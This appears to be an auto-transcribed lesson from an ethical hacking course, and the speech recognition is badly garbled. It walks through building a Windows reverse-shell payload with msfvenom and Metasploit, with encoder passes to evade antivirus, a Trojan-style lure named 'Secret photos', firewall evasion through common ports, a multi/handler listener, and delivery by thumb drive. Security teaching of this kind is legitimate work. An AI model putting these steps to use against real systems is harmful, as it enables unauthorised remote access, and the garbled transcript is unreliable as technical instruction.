Hello, Team Pompilio here for the mess, polite cyber class
and this section We're going to be looking at a way to create a reverse connection on a little window system. We ready? Did analytic system
we're just gonna be sending a simple, executed all file to the victim.
Obviously, you could bundle this this file this payload with the reverse connection to some other kind of ah program. Like like a game
you know, basically created Trojan by wrapping a trusted program around this malicious payload.
The purposes of our demonstration. We're just going to create the payload and show that it works.
All right, so first of all,
we need Thio be honor Callie system,
and we're gonna do is run
some of the medicine Lloyd tools from the command lines that going into the council
and this is a a nice evolution to make for the medicinally practitioner because you're going to want to work more efficiently and perhaps script some of these things.
So you have to start thinking ahead
as to how you're capturing what work you're doing for ah, possible reuse
All right. So we're gonna run the MSF Benham Command
to create a payload,
and we come of this in the linen tutorials. Well, we're gonna use it again.
Now, I've already saved my command in my career in history.
That waiter have to type of Ellen again.
But I hear it. It's so
we start off with Ah, platform. I'm sorry. The payload. When doesn't interpret reverse TCP
notice? I'm not specifying the platform of the architecture. And in many cases,
uh, program will figure out what you want and we'll make some assumptions. And if you don't like the assumption, then you have to adjust it.
I'm gonna exclude known characters. So dash B for bad bites or bad characters Specify local host. That's by the port.
And nothing to start thinking about is the encoder that you use and how many generations you want to go through to try to evade anti virus.
Absolutely beyond the scope of what we're working that right here. But I just included five generations
of the default encoder which will probably be shikata Good night.
Notice miss Specifying a file format. E x e.
This is so the binary will run on eight Windows seven system Children, Plenty of other windows systems as well.
And then I just give it the output.
But I want to call the
file. Maybe I shouldn't call it something so obvious. Let's call
something a little bit more
All right, Secret photos on T X. C.
So think about, you know, social engineering ideas.
All right, we see that
I didn't specify a platform or or an architecture, but it figured it out from the payload.
she got a gun. Eyes I mentioned, and we see that are
our payload has been created.
it's good to be organized. Give all your files in one place, if you if possible.
All right. So now I've got the, uh, the payload created. So my next task is to create a listener.
And the next thing about doing these reverse
connections, either through linens or windows, is
the fact that you should be able to evade certain firewalls. All you have to do is you support that's allowed to the firewall, like, 80 or 443
I'm just using 4444 on a force of habit because that support that's not commonly used. It's frequently a default port for a lot of medicine. Boy,
You're, um, exploits. I should sit.
Okay. So now what I have to do is set up the handler.
And again, I've already typed this in. Someone's gonna bring it up for my command history.
I'm putting in quiet mode again. And the dash access, actually cute, whatever. I put between the double quotes as a series of commands.
So I tell it, uh, to use the multi handler, which is the most versatile one
for these types of connections.
I get the same payload that I put into the
the exploit that I'm going to send to the victim.
And then the usual things air here in my local host, my will comport again. Poured 4444 Make sure this all matches
the payload that you created. Otherwise the connection will work.
And then there's a run command,
which is basically the same thing as saying exploit.
a shortcut for the for exploit. They do the same thing,
So let's go ahead and run this to create de listener
takes a few moments. Okay, there we go.
Let's see. So I'm I am actually running
I'm gonna use a thumb drive to get the file to the victim.
So let's see if you want to go to directory
when rivers show and there's my secret photos.
this is a convenient way to move things between V EMS. If you don't want enable other security features like copy and paste
just a little bit extra work to do the connect and disconnect.
All right. That's no look at it on our window system.